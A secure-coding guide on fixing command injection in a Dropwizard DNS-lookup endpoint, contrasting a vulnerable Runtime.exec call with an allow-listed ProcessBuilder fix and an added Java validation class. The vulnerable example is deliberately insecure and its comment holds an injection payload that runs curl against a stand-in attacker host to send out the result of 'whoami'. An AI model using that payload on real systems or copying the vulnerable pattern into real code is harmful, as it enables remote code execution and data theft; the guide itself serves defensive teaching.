
Fix Command Injection in Dropwizard

Command injection in Dropwizard environments typically surfaces within JAX-RS Resources when unsanitized user input is piped directly into system shells. If you are using Runtime.getRuntime().exec() with string concatenation, you are handing over Remote Code Execution (RCE) to any attacker who can reach your API. This is a critical failure in input handling and process invocation.

The Vulnerable Pattern

import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.QueryParam;
import org.apache.commons.io.IOUtils;

@Path("/v1/system")
public class DiagnosticResource {
    @GET
    @Path("/lookup")
    public String dnsLookup(@QueryParam("domain") String domain) throws IOException {
        // CRITICAL VULNERABILITY: the query parameter is concatenated into the command
        // string unchecked, so the attacker controls what Runtime.exec tokenizes and runs.
        // Example payload: "; curl http://attacker.com/$(whoami)"
        Process p = Runtime.getRuntime().exec("nslookup " + domain);
        return IOUtils.toString(p.getInputStream(), StandardCharsets.UTF_8);
    }
}

The Secure Implementation

The vulnerability exists because Runtime.exec(String) treats the entire string as one command line and tokenizes it itself, so user-controlled text becomes part of the command rather than data, and metacharacters such as ';', '&' and '|' can lead to arbitrary command execution. To remediate, first apply a strict regex allow-list to the input. Second, migrate to ProcessBuilder and pass the command and each argument as separate elements. The operating system then receives 'domain' as a single literal argument to the 'nslookup' binary, never as part of the executable command string, which neutralizes injection attempts.

import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.QueryParam;
import javax.ws.rs.WebApplicationException;
import org.apache.commons.io.IOUtils;

@Path("/v1/system")
public class DiagnosticResource {
    @GET
    @Path("/lookup")
    public String dnsLookup(@QueryParam("domain") String domain) throws IOException {
        // 1. Strict input validation (allow-list approach). The first character must be
        //    alphanumeric so a value such as "-debug" cannot be read as an nslookup option,
        //    and the length is capped at the 253-character hostname maximum.
        if (domain == null || !domain.matches("^[a-zA-Z0-9][a-zA-Z0-9.-]{0,252}$")) {
            throw new WebApplicationException("Invalid domain format", 400);
        }
        // 2. Use ProcessBuilder with separate arguments: 'domain' is always one literal
        //    argv entry, no shell is involved and nothing is re-tokenized.
        ProcessBuilder pb = new ProcessBuilder("nslookup", domain);
        Process p = pb.start();

        return IOUtils.toString(p.getInputStream(), StandardCharsets.UTF_8);
    }
}
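As an added example (not GuardAPI's code and not part of Dropwizard), the following stand-alone Java class carries the remediation above a step further: a hostname allow-list that also rejects a leading hyphen (which nslookup would otherwise read as an option), a helper that reproduces how Runtime.exec(String) splits one string into several argv entries so the contrast with ProcessBuilder is visible, and the validated lookup itself with a bounded wait so a stuck resolver cannot pin a request thread. The class and method names, the 5-second timeout and the sample inputs are assumptions.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.List;
import java.util.StringTokenizer;
import java.util.concurrent.TimeUnit;
import java.util.regex.Pattern;

// Added example, not GuardAPI's or Dropwizard's code; class and method names are assumptions.
public class DomainLookupGuard {
    // Labels of alphanumerics and hyphens, no leading/trailing hyphen, max 63 chars each, 253 overall.
    // Forbidding a leading hyphen also stops "-debug" being read by nslookup as an option (argument injection).
    private static final Pattern HOSTNAME = Pattern.compile(
        "^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
        + "(\\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\\.?$");

    static boolean isValidHostname(String s) {
        return s != null && HOSTNAME.matcher(s).matches();
    }

    // Runtime.exec(String) tokenizes on whitespace like this before launching, so one user-controlled
    // string can become several argv entries. Shown only for comparison; nothing is executed here.
    static List<String> runtimeExecSplit(String commandLine) {
        StringTokenizer st = new StringTokenizer(commandLine);
        String[] argv = new String[st.countTokens()];
        for (int i = 0; st.hasMoreTokens(); i++) argv[i] = st.nextToken();
        return Arrays.asList(argv);
    }
    // Validated input is handed to nslookup as exactly one argument; no shell is involved.
    static String lookup(String domain) throws IOException, InterruptedException {
        if (!isValidHostname(domain)) throw new IllegalArgumentException("Invalid domain format");
        Process p = new ProcessBuilder("nslookup", domain).redirectErrorStream(true).start();
        // Read output first (avoids pipe-buffer deadlock), then reap with a bounded wait. Java 9+ for readAllBytes.
        String out = new String(p.getInputStream().readAllBytes(), StandardCharsets.UTF_8);
        if (!p.waitFor(5, TimeUnit.SECONDS)) {
            p.destroyForcibly();
            throw new IOException("nslookup did not exit in time");
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample inputs: valid name, whitespace plus metacharacter, leading-dash option, empty label.
        for (String in : new String[] {"example.com", "example.com; extra", "-debug", "a..b"}) {
            System.out.printf("%-20s valid=%-5b exec-split=%s%n", in, isValidHostname(in),
                    runtimeExecSplit("nslookup " + in));
        }
        if (args.length > 0) System.out.print(lookup(args[0])); // real lookup only when asked
    }
}
```

Only the first sample passes the allow-list; the second shows that Runtime.exec(String) would have turned a single query parameter into three argv entries, which is exactly what the ProcessBuilder call prevents.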
